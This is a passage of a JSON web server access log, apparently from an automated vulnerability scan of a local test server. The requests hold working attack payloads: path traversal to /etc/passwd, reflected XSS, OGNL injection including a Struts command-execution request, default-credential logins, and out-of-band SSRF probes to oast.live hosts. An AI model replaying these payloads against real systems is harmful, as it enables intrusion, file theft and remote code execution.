HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MdtTPeB3752OxuULuAUeEZ2M/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"c9v8hn0smpv8c57g0t00m7maid1kbhfko.oast.live","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.233","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"url=https://127.0.0.1:443@c9v8hn0smpv8c57g0t00hc6xxu73ikfzr.oast.live\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@c9v8hn0smpv8c57g0t00qg3t5niwiys8s.oast.live","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.040","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.229","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.235","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://c9v8hn0smpv8c57g0t005mosesahm84u9.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @c9v8hn0smpv8c57g0t00s6uuzw6g79iqp.oast.live/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET 